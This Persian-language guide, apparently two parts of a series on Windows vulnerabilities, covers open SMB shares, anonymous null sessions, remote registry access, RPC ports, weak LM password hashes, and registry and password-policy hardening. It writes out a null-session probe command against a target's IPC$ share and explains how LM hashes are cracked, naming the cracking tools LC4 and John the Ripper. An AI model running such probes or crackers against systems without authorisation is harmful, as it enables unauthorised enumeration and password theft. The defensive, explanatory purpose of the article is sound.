در اين مقاله اطلاعاتی در رابطه با تغيير و اصلاح منابع اشتراکی ارائه شده است . بنابراين لازم است ، قبل از انجام هر گونه تغييرات در ارتباط با منابع اشتراکی ، دانش کافی در خصوص برگرداندن منابع به حالت اوليه وجود داشته باشد ( انجام هر گونه تست و اعمال تغييرات می بايست بصورت کاملا" آگاهانه انجام شود ) . بمنظور کسب اطلاعات بيشتر در رابطه با منابع اشتراکی ، می توان از مقالات زير استفاده کرد:
- ذخيره و بازيابی منابع اشتراکی ويندوز
- منابع اشتراکی خاص
- نحوه تنظيم ، مشاهده ، تغيير و يا حذف مجوزهای خاصی در ارتباط با فايل و فولدرها در ويندوز XP
- نحوه غير فعال نمودن اشتراک ساده شده و حفاظت رمز عبور يک فولدر اشتراکی در ويندوز XP
- نحوه کپی فايل ها و نگهداری مجوزهای اشتراک NTFS
مجوزهای پيش فرض در ارتباط با منابع اشتراکی در هر يک از نسخه های ويندوز بصورت زير است :
- ويندوز NT ، ويندوز 2000 و ويندوز XP ( قبل از نصب SP1 ) ، دارای مجوز Everyone و بصورت Full Control می باشند .
- ويندوز XP که بر روی آنان SP1 نصب شده است ، دارای مجوز Everyone و بصورت Read می باشد .
- ويندوز XP بصورت پيش فرض دارای يک دايرکتوری اشتراکی با نام " ShareDocs " است (C:\Documents and Settings\All Users\Documents ) که دارای مجوز Everyone و بصورت Full Control می باشد .
اغلب پويشگرهای موجود، بمنظور بررسی وضعيت منابع استراکی قادر به تشخيص Open Share می باشند ( برخی از برنامه ها رايگان نمی باشند) . يکی از برنانه تست رايگان ،ايمن و سريع بمنظوربررسی وضعيت SMB مربوط به File Sharing و مسائل آسيب پذير مرتبط با آن که قابل استفاده در تمامی نسخه های ويندوز است را می توان از سايت Gibson Research Corporation دريافت نمود . در اين رابطه می توان از ابزارهای پويش اتوماتيک بمنظور تشخيص نقاط آسيب پذير مرتباط با منابع اشتراکی نيز استفاده نمود :
- NesSus : يک ابزار پويش رايگان ، بهنگام شده و ساده بمنظوراستفاده از راه دور .
- Winfingerprint : پويشگر Win32 Host/Network Enumeration

نحوه تشخيص آسيب پذيری سيستم در مقابل Anonymouse Logon و مسائل مرتبط با آن . بمنظور بررسی آسيب پذيری سيستم در رابطه با Anonymouse Logon ، يک null Session را با استفاده از دستور زیر و از طريق خط دستور ، فعال می نمائيم .

From Command Line Prompt :
C:\>net use \\ipaddress\ipc$ "" /user:""

دستور فوق ، باعث ايجاد يک اتصال به منبع اشتراکی $IPC در IPaddress مشخص شده و بعنوان کاربر anonymouse ( نام آن در نظر نگرفته شده است "": user / ) و با يک رمز عبور Null می گردد( ايجاد hidden interprocess communications ) .در صورتيکه پس از اجرای دستور فوق ، System error 5 محقق گردد، نشاندهنده عدم وجود مجوز لازم بمنظور انجام اين کار بوده و سيستم در معرض نقطه آسيب پذير فوق ، قرار نخواهد داشت .در صورتيکه پس از اجرای دستور فوق ، پيامی مبنی بر اجرای موفقيت آميز دستور بر روی صفحه نمايش داده شود ، نشاندهنده آسيب پذيری سيستم در مقابل اين ضعف امنيتی خواهد بود. از نزم افزارهای معرفی شده در بخش قبل ( Nessus و Winfingerprint ) نيز می توان بمنظور تشخيص Null Session ،استفاده نمود .

نحوه تشخيیص آسيب پذيری سيستم در مقابل دستيابی از راه دور به ريجستری ، برنامه NT Resource Kit)NTRK) ، قابل دسترس از طريق مايکروسافت، شامل يک فايل اجرائی با نام regdump.exe بوده که بصورت غير فعال مجوزهای دستيابی به ريجستری را از طريق يک ميزبان ويندوز NT در مقابل ساير ميزبانان ويندوز نظير XP ، 2000 و يا NT بر روی اينترنت و يا شبکه داخلی ، بررسی می نمايد . علاوه بر ابزار فوق ، می توان از آدرس http://www.afentis.com/top20 ، بمنظور آشنائی به ساير ابزارهای موجود ( برنامه های خط دستوری ) نيز استفاده نمود .
- نحوه تشخيص آسيب پذيری سيستم در مقابل RPC و مسائل مربوطه : مايکروسافت در اين رابطه يک ابزار hotfix و Patch-cheking را با نام Microsoft Baseline Security Analyzer ، ارائه داده است . استفاده از برنامه فوق ، بهترين روش بمنظور تشخيص آسيب پذيری سيستم است. برنامه فوق را می توان از طريق آدرس http://www.microsoft.com/technet/security/tools/Tools/MBSAhome.asp دريا فت نمود.

نحوه حفاظت در مقابل نقاط آسيب پذير
نحوه حفاظت در مقابل حملات مرتبط با NETBIOS :
در اين رابطه می توان از راهکارهای متعددی بمنظور کاهش تهديدات مربوطه استفاده نمود :
- غير فعال نمودن sharing در موارديکه ضرورتی به استفاده از آن نمی باشد .
- پيشنهاد می گردد سرويس گيرندگان ويندوز 95 ، 98 و CE که بعنوان بخشی از Domain ويندوز NT می باشند ، بصورت User-Level share access control پيکربندی گردند.
- غير فعال نمودن sharing بر روی ميزبانان اينترنت .اشتراک فايل ها با ميزبانان اينترنت می بايست از طريق FTP و يا HTTP صورت پذيرد.
- در صورت ضرورت استفاده از sharing ، امکان دستيابی به منابع به اشتراک گذاشته شده را فقط از طريق کاربران تائيد شده و مجاز انجام دهيد .بدين ترتيب ، بمنظور استفاده از منبع اشتراکی ، درج رمز عبور الزامی خواهد بود.
- sharing را صرفا" محدود به فولدر نمائيد .بدين ترتيب ، sharing صرفا" در رابطه با يک فولدر انجام و در صورت ضرورت، می توان فولدرهای ديگری را درآن ايجاد و آنان را به اشتراک گذاشت .
- بمنظور افزايش ضريب امنيتی ، می توان امکان sharing را محدود به آدرس های IP نمود. ( امکان دستکاری اسامی DNS می تواند وجود داشته باشد ) .

نحوه حفاظت درمقابل مسائل Anonymouse logon .
در اين مقاله ، اطلاعاتی در رابطه با تغيير ريجستری ارائه شده است ، لذا لازم است قبل از اعمال هرگونه تغيير در ريجستری ، از آن Backup گرفته شده تا در صورت ضرورت ، امکان بازيابی مجدد ( Restore ) آنان وجود داشته باشد.در اين رابطه می توان از منابع اطلاعاتی زير استفاده نمود :

- تشريح ريجستری ويندوز
- نحوه Backup ، ويرايش ، و Restore نمودن ريجستری در ويندوز NT 4.0
- نحوه Backup ، ويرايش و Restore نمودن ريجستری در ويندوز 2000
- نحوه Backup ، ويرايش و Restore نمودن ريجستری در ويندوز XP و ويندوز 2003

کامپيوترهائی که بصورت ويندوز NT Domain Controllers پيکربندی شده اند ، نيازمند يک Null sessions بمنظور ارتباطات مورد نياز خود خواهند بود . بنابراين در صورتيکه از يک Windows NT Domain ويا اکتيو دايرکتوری ويندوز 2000 / 2003 که در حالت ترکيبی اجراء شده است ( امکان دستيابی نسخه های قبل از ويندوز 2000 را نيزفراهم می نمايد ) ، استفاده می گردد ، می توان ميزان اطلاعاتی را که ممکن است توسط مهاحمان استفاده گردد را کاهش ولی نمی بايست اين انتظار وجود داشته باشد که با تنظيم ريجستری RestrictAnonymouse به مقدار يک ، تمامی زمينه ها و پتانسيل های مربوطه حذف گردند. راه حل ايده آل در موارديکه از يک اکتيو دايرکتوری ذاتی ويندوز 2000 , 2003 استفاده می گردد ، مقداردهی RestrictAnonymouse به دو خواهد بود . بمنظور اخذ اطلاعات بيشتر در رابطه با اعمال محدوديت بر اساس null sessions ، می توان از مجموعه مقالات زير استفاده نمود:
- اعمال محدوديت در ارائه اطلاعا ت به کاربران Anonymouse در ويندوز NT
- نحوه استفاداره از مقدار ريجستری RestrictAnonymouse در ويندوز 2000
بمنظور اشکال زدائی ، مقدار ريجستری RestrictAnonymouse می توان از مقاله زير استفاده نمود :
مقدار ريجستری ResteictAnonymous ممکن است باعث شکستن Trust در يک Domain ويندوز 2000 گردد .

نحوه حفاظت در مقابل دستيابی به ريجستری سيستم
بمنظور برخورد با تهديد فوق، می بايست دستيابی و مجوزهای مرتبط به کليدهای مهم و حياتی ريجستری ، بررسی و درصورت لزوم بازنويسی گردند . کاربران ويندوز NT 4.0 ، می بايست از نصب Service Pack 3 بر روی سيستم خود قبل از انجام تغييرات مورد نياز در ريجستری ، مطمئن شوند . در اين مقاله ، اطلاعاتی در رابطه با تغيير ريجستری ارائه شده است ، لذا لازم است قبل از اعمال هرگونه تغيير در ريجستری ، از آن Backup گرفته شده تا در صورت ضرورت ، امکان بازيابی مجدد ( restore ) آنان وجود داشته باشد.در اين رابطه می توان از منابع اطلاعاتی زير استفاده نمود :
- تشريح ريجستری ويندوز
- نحوه Backup ، ويرايش ، و Restore نمودن ريجستری در ويندوز NT 4.0
- نحوه Backup ، ويرايش و Restore نمودن ريجستری در ويندوز 2000
- نحوه Backup ، ويرايش و Restore نمودن ريجستری در ويندوز XP و ويندوز 2003

محدوديت دستيابی شبکه : بمنظور اعمال محدوديت دستيابی به ريجستری از طريق شبکه ، مراحل زير را بمنظور ايجاد يک کليد ريجستری دنبال می نمائيم :

create the following Registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ SecurePipeServers\winreg Description: REG_SZ Value: Registry Server

مجوزهای امنيتی کليد فوق ، کاربران و گروههائی را که دارای مجوز دستيابی از راه دور به ريجستری می باشند را مشخص می نمايد . در زمان نصب ويندوز ، تنظيمات پيش فرض کليد فوق ، Access Control List بوده که امتيازات و مجوزهای کاملی را در اختيار مديريت سيستم و گروههای مديريتی ( Backup Operators در ويندوز 2000 ) قرار می دهد . برای ايجاد يک کليد بمنظور اعمال محدوديت در دستيابی به ريجستری ، مراحل زير را دنبال می نمائيم :
- اجرای برنامه ريجستری ( Regedit32.exe و يا Regedit.exe )
- جستجو جهت يافتن کليد : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
- انتخاب گزينه Add Key از طريق منوی Edit
- درج مقادير زير :

Enter the following values:
Key Name: SecurePipeServers Class: REG_SZ

- جستجو جهت يافتن کليد : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers
- انتخاب گزينه Add Key از طريق منوی Edit
- درج مقادير زير :

Enter the following values: Key Name: winreg
Class: REG_SZ

- جستجو جهت يافتن کليد : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ SecurePipeServers\winreg
- انتخاب گزينه Add Key از طريق منوی Edit
- درج مقادير زير :

Enter the following values:
Value Name: Description Data Type: REG_SZ String: Registry Server

- جستجو جهت يافتن کليد : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ SecurePipeServers\winreg
- انتخاب winreg ، کليک بر روی Security و در ادامه Permissions . در اين حالت می توان کاربران و گروه های مجاز بمنظور اعطاء مجوز دستيابی به ريجستری را اضافه نمود .
- از برنامه Registry Editor خارج و بمنظور فعال شدن تنظيمات انجام شده ، سيستم را راه اندازی نمائيد .
در صورتيکه در ادامه قصد تغيير ليست کاربران مجاز دستيابی به ريجستری وجود داشته باشد ، می توان آخرين مرحله اشاره شده را تکرار نمود.

اعمال محدوديت دستيابی از راه دور تائيد شده : اعمال محدوديت صريح در ارتباط با ريجستری، می تواند اثرات جانبی ناسازگاری را در رابطه با سريس های وابسته نظير Directory Replicator و printer Spooler service ، بدنبال داشته باشد . در اين رابطه می توان سطح خاصی از مجوزهای لازم را با افزودن account name مربوط به سرويس در حا ل اجراء به ليست دستيابی کليد winreg ، و يا با پيکربندی ويندوز بمنظور عدم اعمال محدوديت دستيابی به کليدهای خاصی را تعريف نمود ( مشخص نمودن آنان در کليد AllowedPaths مربوط به Machine و يا Users ) :

Bypass the access restriction :

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ SecurePipeServers\winreg\AllowedPaths Value: Machine Value Type: REG_MULTI_SZ - Multi string Default Data: System\CurrentControlSet\Control\ProductOptionsSystem\ CurrentControlSet\Control\Print\PrintersSystem\CurrentControlSet\ Services\EventlogSoftware\Microsoft\WindowsNT\CurrentVersionSystem\ CurrentControlSet\Services\Replicator Valid Range: (A valid path to a location in the registry) Description: Allow machines access to listed locations in the registry provided that no explicit access restrictions exist for that location. Value: Users Value Type: REG_MULTI_SZ - Multi string Default Data: (none) Valid Range: (A valid path to a location in the registry) Description: Allow users access to listed locations in the registry provided that no explicit access restrictions exist for that location.

نحوه حفاظت سيستم در مقابل مسائل مرتبط با RPC
بهترين روش در اين رابطه نصب Patch های ارائه شده توسط MBSA و يا Windows Update می باشد. در اين رابطه روش های متعددی بمنظور غيرفعال نمودن و يا اعمال محدوديت درارتباط با عملکرد RPC وجود دارد . استفاده از آدرس http://www.ntbugtraq.com/dcomrpc.asp در اين رابطه می تواند مفيد باشد . لازم است به اين نکته مهم اشاره گردد که غيرفعال نمودن و يا اعمال محدوديت در رابطه با نحوه عملکرد RPC ، می تواند باعث از کار افتادن برخی سرويس ويندوز گردد ، بنابراين پيشنهاد می گردد که در ابتدا تغييرات مورد نظر خود را يک سيستم غيرعملياتی انجام و پس از اطمينان از صحت عملکرد ، آنان را بر روی سيستم اصلی اعمال نمود.در صورتيکه امکان Patch نمودن سيستم وجود نداشته باشد ، می بايست پورت های مرتبط با RPC در ويندوز ( پورت های 135 و139 و 445 و 593 مربوط به TCP و پورت های 135 ، 137 ، 138 ، و 445 مربوط به UDP) را بلاک نمود.
بمنظور آشنائی با نحوه اعمال محدوديت دستيابی به ريجستری ويندوز و ساير موارد اشاره شده در رابطه با نقطه آسيب پذير Windows Remote Access Services ، می توان از منابع اطلاعاتی زير استفاده نمود:
- Microsofts HotFix & Security Bulletin Service
- نحوه استفاده از ويندوز XP و Windows Server 2003 Registry Editor
- Network access: Remotely accessible registry paths and subpaths
- Windows Server 2003 Security Guide

در بخش چهارم اين مقاله به بررسی ساير نقاط آسيب پذير ويندوز خواهيم پرداخت .

 

در بخش اول اين مقاله به بررسی دو مورد از نقاط آسيپ پذير ويندوز پرداخته گرديد . در اين بخش به بررسی سومين نقطه آسيب پذير ويندوز ، اشاره می گردد.
سومين نقطه آسيب پذير : Windows Authentication
استفاده از رمزعبور، روش های تائيد کاربر و کدهای امنيتی در هر گونه تعامل ارتباطی بين کاربران وسيستم های اطلاعاتی ، امری متداول و رايج است . اکثر روش ها ی  تائيد کاربران ، نظير حفاظت فايل و داده ، مستقيما" به رمزهای عبور ارائه شده توسط کاربران ، بستگی خواهد داشت . پس از تائيد کاربران ، امکان دستيابی آنان به منابع مشخص شده فراهم و هر يک از آنان  با توجه به امتيازات و مجوزهای نسبت داده شده ، قادر به استفاده از منابع موجودخواهند بود. در اغلب موارد ، فعاليت کاربرانی که مجاز بودن آنان برای دستيابی به منابع ، تائيد شده است ، لاگ نشده و يا در صورتيکه فعاليت آنان ثبت گردد ، کمتر سوء ظنی به آنان می تواند وجود داشته باشد . ( آنان پس از تائيد وارد ميدانی شده اند که بدون هيچگونه رديابی ، قادر به انجام فعاليت های گسترده ای خواهند بود) . بنابراين ، رمز عبور دارای نقشی حياتی و اساسی در ايجاد اولين سطح دفاع در يک سيستم اطلاعاتی بوده  و از دست رفتن رمز عبور و يا  ضعف آن می تواند سيستم را در معرض تهديدات جدی قرار دهد . مهاجمان پس از دستيابی به رمز عبور کاربران تائيد شده ( استفاده از مکانيزم های متفاوت ) قادر به دستيابی منابع سيستم و حتی تغيير در تنظيمات ساير account های تعريف شده و موجود بر روی سيستم خواهند بود،عملياتی که می تواند پيامدهای بسيار منفی را بدنبال داشته باشد . پس می بايست بپذيريم که وجود يک account ضعيف و يا فاقد رمز عبور می تواند تهديدی جدی در يک سازمان باشد . در اين راستا علاوه بر اينکه می بايست از پتانسيل های ارائه شده توسط سيستم عامل با دقت استفاده نمود ، ضروری است ، تابع يک  سياست امنيتی تدوين شده در رابطه با رمز عبور در سازمان متبوع خود باشيم . تعريف و نگهداری يک account بهمراه رمز عبور مربوطه در سازمان ما تابع چه سياست امنيتی است ؟  مهمترين و متداولترين نقاط آسيب پذير در ارتباط با رمز عبور شامل موارد زير است :

• Account  تعريف شده  دارای رمز عبور ضعيف و يا فاقد رمز عبور است .
• عدم حفاظت مناسب کاربران از رمزهای عبور ،صرفنظر از استحکام رمزهای عبور تعريف شده .
• سيستم عامل و يا ساير نرم افزارهای موجود ، امکان ايجاد account مديريتی ضعيف  و فاقد رمز عبور را فراهم می نمايند .
• الگوريتم های Hashing رمز عبور( رمزنگاری مبتنی بر کليد عمومی بر پايه يک مقدار hash ، استوار بوده و بر اساس يک مقدار ورودی که دراختيار الگوريتم hashing گذاشته می گردد ، ايجاد می گردد. در حقيقت مقدار hash ، فرم خلاصه شده و رمز شده ای  از مقدار اوليه خود است  ) ، شناخته شده بوده و در اغلب موارد مقدار Hashe بدست آمده ، بگونه ای ذخيره می گردد که امکان مشاهده آن توسط سايرين وجود خواهد داشت. مناسبترين نوع حفاظت در اين راستا ، تبعيت از يک سياست رمز عبور قدرتمند بوده  که در آن دستورالعمل ها ی لازم برای تعريف يک رمز عبورمناسب مشخص و در ادامه با استفاده از ابزارهای موجود، بررسی لازم در خصوص  استحکام و بی نقص بودن رمز عبور صورت گيرد.

ويندوز، رمزهای عبور را بصورت متن شفاف ذخيره و يا ارسال نمی نمايد و در اين راستا از يک مقدار  Hash  متناظر با  رمزعبور ، بمنظور تائيد کاربران ، استفاده می نمايد . يک مقدار Hash دارای طولی ثابت است که توسط بکارگيری يک تابع رياضی ( الگوريتم hashing ) بر روی  حجم دلخواهی از داده ( message digest  ناميده می شود) ايجاد می شود.در وينوز سه نوع الگوريتم تائيد وجود دارد :

• LM   ( ايمنی کمتر و سازگاری بيشتر )
• NTLM
• NTLMv2  ( ايمنی بيشتر و سازگاری کمتر )

با اينکه اکثر محيط های فعلی ويندوز ، ضرورتی به حمايت از  (Lan Manager  (LM را ندارند، ولی ويندوز بصورت محلی رمز های عبور Hash  شده مربوط به LM  را ( LANMAN Hashes  نيز ناميده می شود )  بصورت پيش فرض در ويندوز NT ، 2000 و XP ( در ويندوز 2003 وضعيت بدين شکل نيست ) ذخيره می نمايد. با توجه به اينکهLM  از يک مدل رمزنگاری بمراتب ضعيف تر نسبت به رويکردهای فعلی مايکروسافت ( NTLM,NTLMv2 ) ،  استفاده می نمايد، رمزهای عبور LM می توانند در مدت زمانی کوتاه  شکسته گردند. حتی رمزهای عبوری که دارای قدرت و استحکام مناسبی می باشند ، در کمتر از يک هفته با استفاده از روش هائی خاص و با اتکاء به قدرت سخت افزارهای موجود ،  شکسته خواهند شد
http://www.msdn.miscrosoft.com/library/default.asp?url=/library/en-us/security/Security/h_gly.asp

ضعف LM hashes  بدلايل زير است :

• رمزهای عبور محدود  به چهارده کاراکتر می باشند .
• رمزهای عبور با استفاده از فضای خالی ، به چهارده کاراکتر تبديل می شوند .
• رمزهای عبور تماما" به حروف بزرگ تبديل می گردند .
• رمزهای عبور به دو بخش هفت کاراکتری مجزا تقسيم  می گردند .

با توجه به ماهيت فرآيند hashing ،يک مهاجم صرفا" می بايست عمليات تشخيص رمز عبور( cracking) را محدود به دو مجموعه نمايد  که هر يک دارای هفت کاراکتر بوده که به  حروف بزرگ تبديل شده اند . با تکميل عمليات فوق و اخد نتايج مثبت ، يک مهاجم قادر به تشخيص رمز عبور يک کاربر تائيد شده می گردد وبدين ترتيب ، امکان دستيابی وی به منابع سيستم فراهم خواهد شد. پيچيدگی عمليات تشخيص Hashe ، متنا سب با طول Hash افزايش می يابد ، بنابراين رشته هائی که صرفا" شامل هفت کاراکتر می باشند ، بمراتب راحت تر نسبت به رشته هائی که دارای چهارده کاراکتر می باشند ، تشخيص داده و اصطلاحا" شکسته می گردند. با توجه به اين موضوع که تمامی رشته ها شامل هفت کاراکتر بوده و تمامی آنان به حروف بزرگ  نيز تبديل  می گردند ، يک تهاجم به  "سبک - ديکشنری" ( dictionary-style ) نيز بسادگی محقق و موفقيت آن تضمين شده خواهد بود. بنابراين، روش LM hashing ، آسيبی جدی را متوجه سياست های امنيتی رمز عبور نموده و سيستم را در معرض تهديد قرار خواهد داد .
علاوه بر تهديد و خطر ذخيره سازی LM hashes در SAM ، فرآيند تائيد Lan Manager  ، اغلب و بصورت پيش فرص بر روی سرويس گيرندگان فعال و توسط سرويس دهنده پذيرفته می گردد . لازم است به اين نکته اشاره گردد که ، ماشين هائی که بر روی آنان ويندوز نصب شده است ، قادر به استفاده از الگوريتم های hash بمراتب قويتر در مقابل روش ضعيف LM hashes  بمنظور ارسال داده های حساس نظير رمز عبور می باشند .حداقل پيامد منفی استفاده از روش LM hashes ، آسيب پذيری سيستم تائيد کاربران در ويندوز بوده و قطعا" در چنين مواردی نمی توان به فرآيند تائيد کاربران ، اعتماد نمود چراکه  در اين وضعيت عملا" امکان استراق سمع ( شنود اطلاعاتی ) فراهم و يک مهاجم قادر به تشخيص و بدست آوردن رمزهای عبور خواهد بود.

سيستم های عامل در معرض تهديد :
تمامی نسخه های ويندوز در معرض اين تهديد قرار دارند .

نحوه تشخيص آسيب پذيری سيستم
با اينکه دلايل و علل متفاوتی می تواند در در رابطه با ضعف رمز عبور مورد توجه قرار گيرد ، مثلا" وجود Account های فعال برای کاربرانی که سازمان خود را ترک نموده ويا سرويس هائی که اجراء نشده اند، ولی يکی از مناسبترين روش ها بمنظور آگاهی از استحکام  يک رمز عبور ، بررسی  و تست تمامی آنان در مقابل نرم افزارهای cracking رمزهای عبور استفاده شده توسط مهاجمان است . لازم است به اين نکته مهم اشاره گردد که از برنامه های تشخيص دهنده رمز عبور بر روی سيستم هائی که حتی مجوز دستيابی به آنان را داريد ، بدون اخذ مجوزهای لازم  از مديران ارشد سيستم  ، نمی بايست استفاده نمود. برای دريافت نمونه برنامه هائی در اين زمينه می توان از   LC4 )l0phtcrack version 4) و John the Ripper استفاده کرد . صرفنظر از رويکرد ذخيره سازی محلی LAN Manager hash ، موارد زير می بايست موردتوجه قرار گيرد :

• در صورتيکه ويندوز NT ، 2000 و يا XP بصورت پيش فرض نصب شده اند،سيستم در معرض آسيب خواهد بود. در چنين مواردی Lan Manager hashes بصورت پيش فرض و محلی ذخيره می گردد.
• در صورتيکه ، بدلايلی نيازمند تائيد مبتنی بر LM در يک سازمان بمنظور ارتباط با سرويس دهنده وجود داشته باشد ، سيستم مجددا" در معرض آسيب قرار خواهد گرفت .چراکه اين نوع از ماشين ها اقدام به ارسال LM hashes نموده و پتانسيل شنود اطلاعاتی در شبکه را ايجاد خواهند کرد.

نحوه حفاظت در مقابل نقطه آسيب پذير :
بهترين و مناسبترين دفاع در مقابل رمزهای عبور ضعيف ، استفاده از يک سياست مستحکم مشتمل بر دستورالعمل های لازم بمنظور ايجاد رمز عبور قدرتمند و بررسی مستمر آنان بمنظور اطمينان از استحکام و صحت  عملکرد می باشد . در اين رابطه موارد زير پيشنهاد می گردد :

• اطمينان ازاستحکام و انسجام  رمز های عبور . با استفاده از سخت افزار مناسب و اختصاص زمان کافی ، می توان هر رمز عبوری را  crack نمود. در اين راستا می  توان با استفاده ازروش های ساده و در عين حال موفقيت آميز، عمليات تشخيص رمز عبور را انجام داد . اغلب برنامه های تشخيص دهنده رمزعبوراز روشی موسوم به "حملات مبتنی بر سبک ديکشنری " ، استفاده می نمايند. با توجه به اينکه روش های رمز نگاری تا حدود زيادی شناخته شده می باشند  ، برنامه های  فوق ، قادر به مقايسه  شکل  رمز شده يک رمز عبور در مقابل شکل  های رمز شده کلمات ديکشنری می باشند( در زبان های متعدد و استفاده از اسامی مناسب بهمراه جايگشت های مختلف آنان  ) . بنابراين ، رمز عبوری  که ريشه آن در نهايت يک کلمه شناخته شده باشد ، دارای استعداد ذاتی در رابطه با اين نوع از حملات خواهد بود . تعداد زيادی از سازمان ها ، آموزش های لازم در خصوص نحوه تعريف رمزهای عبور را به کارکنان خود داده و به آنان گفته شده است  که رمزهای عبور مشتمل بر ترکيبی از حروف الفبائی و کاراکترهای ويژه را برای خود تعريف نمايند.متاسفانه اکثر کاربران اين موضوع را رعايت ننموده و  بمنظور تعريف يک رمز عبور با نام "password" ، صرفا" اقدام به تبديل حروف به اعداد و يا حروف ويژه می نمايند ( pa$$w0rd) . چنين جايگشت هائی نيز قادر به  مقاومت در مقابل يک تهاجم مبتنی بر ديکشنری نبوده و  "pa$$w0rd" به روش مشابهی که "password" تشخیص داده می شود ، crack خواهد شد .
  يک رمز عبور خوب ، نمی بايست از ريشه يک  کلمه و يا نام شناخته شده ای  اقتباس شده باشد .در اين راستا لازم است به کاربران آموزش لازم در خصوص انتخاب و ايجاد رمزهای عبور از موارد تصادفی نظير  يک عبارت ، عنوان يک کتاب ،نام يک آواز و يا نام يک فيلم  داده شود. با انتخاب  يک رشته طولانی که بر اساس رويکردهای خاصی می تواند انتخاب گردد( گرفتن اولين حرف هر کلمه ، جايگزينی يک کاراکتر خاص برای يک کلمه ، حذف تمامی حروف صدادارو  ساير موارد ) ، کاربران قادر به ايجاد رمزهای عبور مشتمل بر ترکيبی از حروف الفبائی و حروف ويژه بوده که در صورت مواجه شدن  با حملات مبتنی بر ديکشنری ، تشخيص آنان بسختی انجام می شود. لازم است به اين نکته نيز اشاره گردد که رمزعبور می بايست براحتی بخاطر سپرده شده و بازيابی ( يادآوری)آن مشکل نباشد ( هدف از ذخيره سازی ، بازيابی است اگر چيزی را ذخيره  نمائيم ولی در زمان مورد نظر قادر به بازيابی آن نباشيم ، سيستم ذخيره و بازيابی ما با اشکال مواجه شده است ! ). پس از تدوين دستورالعمل لازم بمنظور توليد رمزهای عبور مناسب و  آموزش کاربران بمنظور پايبندی به  اصول امنيتی تعريف شده ، می بايست از روتين ها ی جانبی متعددی بمنظور اطمينان از پيروی کاربران از دستوراالعمل های اعلام شده ، استفاده گردد. بهترين گزينه در اين راستا ، بررسی صحت رمزهای عبور پس از اعمال تغييرات توسط کاربران است .
  ويندوز 2000 ، XP و 2003 دارای ابزارهای قدرتمندی بمنظورافزايش توان سياست های امنيتی می باشند . در اکثر نسخه های ويندوز بمنظور مشاهده سياست تعريف شده در رابطه با رمز می توان از مسير زير استفاده و برنامه  Local Security Policy  را فعال نمود:

Local Security Policy Program

Start| Programs|Administrative Tools |Local Security Policy Select : Account Policies , Then  Password Policy

• برنامه  Local Security Policy دارای تنظيمات زير است :
  Password must meet complexity requirements ، با فعال نمودن سياست فوق ، رمزهای عبور ملزم به رعايت استانداردهای موجود بمنظور استحکام و پيچيدگی بيشتر در زمان ايجاد و يا تغيير می باشند. در چنين حالتی ، رمزهای عبور تعريف شده می بايست  با لحاظ نمودن موارد زير ايجاد گردند:
  ◄ رمز عبور، نمی بايست شامل تمام و يا بخشی از نام account کاربر باشد .
  ◄ رمز عبور می بايست دارای حداقل  شش کاراکتر باشد .
  ◄ رمز عبور می بايست شامل کاراکترهائی از سه گروه از چهار مجموعه  زير باشد :
  ●  حروف بزرگ الفبای انگليسی ( A تا Z )
  ● حروف کوچک الفبای انگليسی ( a تا z )
  ● ارقام پايه دهدهی ( رقم های     0 تا 9 )
  ● کاراکترهای غير الفبائی ( مثلا" ! ، $ ، # ، % )
  ( Enforce password history (range: 0-24  . اغلب کاربران تمايل دارند که پس از انقضاء تاريخ استفاده از رمز عبور خود ، مجددا" همان رمز عبور قبلی را تعريف و از آن استفاده نمايند . با استفاده از سياست فوق ، می توان مشخص نمود که در چه زمانی و پس از چندين رمز عبور تعريف شده جديد ، کاربران مجاز به استفاده از رمزهای عبور قبلی خود برای وضعيت جديد می باشند .بدين ترتيب ،مديران شبکه اطمينان لازم در خصوص عدم استفاده مستمر و دائمی يک رمز عبور توسط کاربران را بدست آورده و اين موضوع می تواند از زوايای مختلفی بهبود وضعيت امنيتی شبکه را بدنبال داشته باشد . بمنظور نگهداری موثر تاريخچه رمز عبور، نمی بايست امکان تغيير رمزهای عبور بلافاصله  پس از پيکربندی سياست  minimum password age   ، وجود داشته باشد .
  ( Maximum password age (range: 0-999 days . سياست فوق ، حداکثر عمر( اعتبار)  يک  رمز عبور را بر حسب روز ، مشخص می نمايد.( قبل از اينکه سيستم کاربر را ملزم به تغيير رمز عبور نمايد) . با در نظر گرفتن مقدار صفر ، رمز عبور دارای عمری جاودانه خواهد شد !
  (Minimum password age (range: 0-999 days . سياست فوق ، حداقل عمر( اعتبار)  يک  رمز عبور را بر حسب روز ، مشخص می نمايد( قبل از اينکه کاربر قادر به تغيير رمزعبور گردد) . با در نظر گرفتن مقدار صفر ، به کاربران اجازه داده خواهد شد که بلافاصله رمز عبور خود را تغيير دهند. minimum password age می بايست کمتر از maximum password age باشد . پيکربندی  minimum password age می بايست بگونه ای انجام شود که دارای مقداری بيش از صفر باشد تا سياست password history  نيز لحاظ شده باشد. بدون وجود يک  minimum password age ، کاربران قادر به تغيير ادواری و زمانبندی نشده رمزهای عبور شده  و امکان استفاده مجدد از رمزهای عبور قديمی در يک محدوده زمانی کمتر برای آنان فراهم می گردد.مقادير پيش فرض تامين کننده اهداف و خواست های امنيتی در يک سازمان نبوده و لازم است مديران سيستم  در ابتدا يک رمز عبور مناسب را برای کاربر تعريف و پس از سپری شدن مدت زمان مشخصی ( مدت زمان فوق را minimum password age  مشخص می نمايد ) کاربر را ملزم به تعريف ( تغيير ) رمز عبور تعريف شده توسط مديريت شبکه نمايند. زمانيکه کاربران ،عمليات Log on را انجام و در صورتيکه  password history مقدار صفر را دارا باشد ، الزامی در رابطه با انتخاب يک رمز عبور جديد برای کاربران وجود نخواهد داشت . بدين دليل password history دارای مقدار پيش فرض يک است .
  (Minimum password length (range: 0-14 characters ، سياست فوق ، حداقل تعداد کاراکتر لازم برای تعريف يک رمز عبور را مشخص می نمايد( حداقل طول يک رمز عبور)  می توان در اين رابطه حداقل طول يک رمز عبور را بين يک تا چهارده  کاراکتر در نظر گرفت . با اختصاص مقدار صفر ، ضرورت وجود رمز عبور حذف می گردد. حداقل طول رمز عبور، می بايست متناسب و سازگار با سياست های امنيتی سازمان باشد. در صورتيکه در اين رابطه سياست مشخص و شفافی وجود ندارد می توان مقدار هشت را در نظر گرفت .برخی از سازمان های امنيت اطلاعات شبکه ، مقدار دوازده را در اين رابطه پيشنهاد داده اند .
